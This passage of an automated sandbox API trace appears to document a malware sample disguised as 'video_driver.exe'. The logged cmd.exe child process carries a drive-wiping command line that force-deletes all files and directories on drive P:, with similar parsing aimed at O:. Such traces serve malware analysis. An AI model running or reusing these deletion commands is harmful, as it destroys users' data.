hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504c70 | out: hHeap=0x4f0000) returned 1 [0064.696] GetEnvironmentStringsW () returned 0x504180* [0064.696] GetProcessHeap () returned 0x4f0000 [0064.696] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb36) returned 0x505fa0 [0064.696] FreeEnvironmentStringsW (penv=0x504180) returned 1 [0064.696] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.696] GetProcessHeap () returned 0x4f0000 [0064.696] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5017c8 | out: hHeap=0x4f0000) returned 1 [0064.696] GetProcessHeap () returned 0x4f0000 [0064.696] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400e) returned 0x506ae0 [0064.696] GetProcessHeap () returned 0x4f0000 [0064.697] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa0) returned 0x502e50 [0064.697] GetProcessHeap () returned 0x4f0000 [0064.697] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae0 | out: hHeap=0x4f0000) returned 1 [0064.697] GetConsoleOutputCP () returned 0x1b5 [0064.697] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.697] GetUserDefaultLCID () returned 0x409 [0064.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0064.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f920, cchData=128 | out: lpLCData="0") returned 2 [0064.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f920, cchData=128 | out: lpLCData="0") returned 2 [0064.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f920, cchData=128 | out: lpLCData="1") returned 2 [0064.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0064.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0064.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0064.699] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0064.699] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0064.699] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0064.699] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0064.699] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0064.699] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0064.699] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0064.699] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0064.700] GetProcessHeap () returned 0x4f0000 [0064.700] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20c) returned 0x502ef8 [0064.701] GetConsoleTitleW (in: lpConsoleTitle=0x502ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0064.701] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.701] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0064.701] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0064.701] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0064.702] GetProcessHeap () returned 0x4f0000 [0064.702] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x506ae0 [0064.702] GetProcessHeap () returned 0x4f0000 [0064.702] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x50aaf8 [0064.702] GetProcessHeap () returned 0x4f0000 [0064.702] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1a) returned 0x5057e0 [0064.703] GetEnvironmentVariableW (in: lpName="p IN (\"O", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.703] _wcsicmp (_String1="p IN (\"O", _String2="CD") returned 13 [0064.703] _wcsicmp (_String1="p IN (\"O", _String2="ERRORLEVEL") returned 11 [0064.703] _wcsicmp (_String1="p IN (\"O", _String2="CMDEXTVERSION") returned 13 [0064.703] _wcsicmp (_String1="p IN (\"O", _String2="CMDCMDLINE") returned 13 [0064.703] _wcsicmp (_String1="p IN (\"O", _String2="DATE") returned 12 [0064.703] _wcsicmp (_String1="p IN (\"O", _String2="TIME") returned -4 [0064.703] _wcsicmp (_String1="p IN (\"O", _String2="RANDOM") returned -2 [0064.703] _wcsicmp (_String1="p IN (\"O", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.703] GetProcessHeap () returned 0x4f0000 [0064.703] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5057e0 | out: hHeap=0x4f0000) returned 1 [0064.703] GetProcessHeap () returned 0x4f0000 [0064.703] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50aaf8 | out: hHeap=0x4f0000) returned 1 [0064.703] GetProcessHeap () returned 0x4f0000 [0064.703] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x50aaf8 [0064.703] GetProcessHeap () returned 0x4f0000 [0064.703] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50aaf8 | out: hHeap=0x4f0000) returned 1 [0064.704] GetProcessHeap () returned 0x4f0000 [0064.704] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae0 | out: hHeap=0x4f0000) returned 1 [0064.704] _wcsicmp (_String1="if", _String2=")") returned 64 [0064.704] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0064.704] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0064.704] _wcsicmp (_String1="IF", _String2="if") returned 0 [0064.704] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0064.704] GetProcessHeap () returned 0x4f0000 [0064.704] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503110 [0064.704] GetProcessHeap () returned 0x4f0000 [0064.704] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe) returned 0x4fffc0 [0064.705] GetProcessHeap () returned 0x4f0000 [0064.705] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x20) returned 0x5057e0 [0064.705] GetProcessHeap () returned 0x4f0000 [0064.706] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5057e0, Size=0x16) returned 0x501800 [0064.706] GetProcessHeap () returned 0x4f0000 [0064.706] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x501800) returned 0x16 [0064.706] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0064.706] GetProcessHeap () returned 0x4f0000 [0064.706] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503170 [0064.706] GetProcessHeap () returned 0x4f0000 [0064.706] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x14) returned 0x5031d0 [0064.706] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0064.706] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0064.707] GetProcessHeap () returned 0x4f0000 [0064.707] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x12) returned 0x5031f0 [0064.707] GetProcessHeap () returned 0x4f0000 [0064.707] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1c) returned 0x5057e0 [0064.707] GetProcessHeap () returned 0x4f0000 [0064.707] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5057e0, Size=0x14) returned 0x503210 [0064.707] GetProcessHeap () returned 0x4f0000 [0064.707] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x503210) returned 0x14 [0064.708] _wcsicmp (_String1="del", _String2=")") returned 59 [0064.708] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0064.708] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0064.708] _wcsicmp (_String1="IF", _String2="del") returned 5 [0064.708] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0064.708] _wcsicmp (_String1="REM", _String2="del") returned 14 [0064.708] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0064.708] GetProcessHeap () returned 0x4f0000 [0064.708] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503230 [0064.708] GetProcessHeap () returned 0x4f0000 [0064.708] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x10) returned 0x4fffd8 [0064.708] GetProcessHeap () returned 0x4f0000 [0064.709] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x28) returned 0x503290 [0064.709] GetProcessHeap () returned 0x4f0000 [0064.709] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x5032c0 [0064.710] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0064.710] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0064.710] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0064.710] GetProcessHeap () returned 0x4f0000 [0064.710] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503320 [0064.710] GetProcessHeap () returned 0x4f0000 [0064.710] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x44) returned 0x503380 [0064.711] GetProcessHeap () returned 0x4f0000 [0064.711] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x14) returned 0x5033d0 [0064.711] GetProcessHeap () returned 0x4f0000 [0064.711] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5033d0, Size=0x12) returned 0x5033d0 [0064.711] GetProcessHeap () returned 0x4f0000 [0064.711] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x5033d0) returned 0x12 [0064.711] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0064.711] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0064.711] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0064.712] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0064.712] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0064.712] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0064.712] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0064.712] GetProcessHeap () returned 0x4f0000 [0064.712] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x12) returned 0x5033f0 [0064.713] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0064.714] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0064.714] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0064.714] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0064.714] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0064.714] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0064.714] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0064.714] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0064.714] GetProcessHeap () returned 0x4f0000 [0064.714] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503410 [0064.714] GetProcessHeap () returned 0x4f0000 [0064.714] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x14) returned 0x503470 [0064.714] GetProcessHeap () returned 0x4f0000 [0064.714] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x20) returned 0x5057e0 [0064.716] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0064.718] GetFullPathNameW (in: lpFileName="O:", nBufferLength=0x208, lpBuffer=0x32f610, lpFilePart=0x32f3bc | out: lpBuffer="O:\\", lpFilePart=0x32f3bc*=0x0) returned 0x3 [0064.719] wcsncmp (_String1="O:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -13 [0064.724] GetFileAttributesW (lpFileName="O:\\" (normalized: "o:")) returned 0xffffffff [0064.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.724] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.725] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.725] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.725] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.725] SetConsoleInputExeNameW () returned 0x1 [0064.725] GetConsoleOutputCP () returned 0x1b5 [0064.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.726] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.726] exit (_Code=0) Process: id = "36" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42113000" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"P:\" del /f /s /q \"P:\" & FOR /D %p IN (\"P:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 64 os_tid = 0xa14 [0064.840] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcb4 | out: lpSystemTimeAsFileTime=0x1cfcb4*(dwLowDateTime=0x47673c0, dwHighDateTime=0x1d62400)) [0064.840] GetCurrentProcessId () returned 0xafc [0064.840] GetCurrentThreadId () returned 0xa14 [0064.840] GetTickCount () returned 0x1147a6e [0064.840] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfcac | out: lpPerformanceCount=0x1cfcac*=18497399964) returned 1 [0064.842] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0064.842] __set_app_type (_Type=0x1) [0064.842] __p__fmode () returned 0x770331f4 [0064.842] __p__commode () returned 0x770331fc [0064.842] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0064.843] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0064.843] GetCurrentThreadId () returned 0xa14 [0064.844] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa14) returned 0x60 [0064.844] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.844] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0064.844] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.844] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0064.844] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc44 | out: phkResult=0x1cfc44*=0x0) returned 0x2 [0064.845] VirtualQuery (in: lpAddress=0x1cfc7b, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.845] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0064.845] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0064.845] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.845] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0064.845] GetConsoleOutputCP () returned 0x1b5 [0064.845] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.845] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0064.845] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.845] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0064.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.846] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.846] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.847] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.847] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.847] GetEnvironmentStringsW () returned 0x5220f8* [0064.847] GetProcessHeap () returned 0x510000 [0064.847] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xaca) returned 0x522bd0 [0064.847] FreeEnvironmentStringsW (penv=0x5220f8) returned 1 [0064.848] GetProcessHeap () returned 0x510000 [0064.848] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4) returned 0x521898 [0064.848] GetEnvironmentStringsW () returned 0x5220f8* [0064.848] GetProcessHeap () returned 0x510000 [0064.848] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xaca) returned 0x5236a8 [0064.848] FreeEnvironmentStringsW (penv=0x5220f8) returned 1 [0064.848] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebb4 | out: phkResult=0x1cebb4*=0x68) returned 0x0 [0064.848] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x0, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0064.848] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x4) returned 0x0 [0064.849] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0064.849] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x0, lpcbData=0x1cebb8*=0x4) returned 0x0 [0064.849] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x4) returned 0x0 [0064.849] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x4) returned 0x0 [0064.849] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0064.849] RegCloseKey (hKey=0x68) returned 0x0 [0064.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebb4 | out: phkResult=0x1cebb4*=0x68) returned 0x0 [0064.849] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0064.849] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x4) returned 0x0 [0064.849] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0064.849] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x0, lpcbData=0x1cebb8*=0x4) returned 0x0 [0064.850] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x9, lpcbData=0x1cebb8*=0x4) returned 0x0 [0064.850] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x9, lpcbData=0x1cebb8*=0x4) returned 0x0 [0064.850] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x9, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0064.850] RegCloseKey (hKey=0x68) returned 0x0 [0064.850] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6a [0064.850] srand (_Seed=0x5eb34b6a) [0064.850] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"P:\" del /f /s /q \"P:\" & FOR /D %p IN (\"P:\") DO rmdir \"%p\" /s /q" [0064.850] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"P:\" del /f /s /q \"P:\" & FOR /D %p IN (\"P:\") DO rmdir \"%p\" /s /q" [0064.850] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.851] GetProcessHeap () returned 0x510000 [0064.851] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x210) returned 0x5220f8 [0064.851] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x522100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0064.851] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0064.851] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0064.851] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.851] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0064.851] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0064.851] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0064.851] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0064.851] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0064.851] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0064.851] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0064.851] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.852] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0064.852] GetProcessHeap () returned 0x510000 [0064.852] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x522bd0 | out: hHeap=0x510000) returned 1 [0064.852] GetEnvironmentStringsW () returned 0x522310* [0064.852] GetProcessHeap () returned 0x510000 [0064.852] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xae2) returned 0x524c70 [0064.852] FreeEnvironmentStringsW (penv=0x522310) returned 1 [0064.852] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0064.852] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.852] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0064.852] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0064.852] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0064.852] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0064.852] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0064.852] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0064.852] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0064.853] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0064.853] GetProcessHeap () returned 0x510000 [0064.853] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x54) returned 0x5217c8 [0064.853] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf980 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf980, lpFilePart=0x1cf97c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf97c*="Desktop") returned 0x25 [0064.853] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: 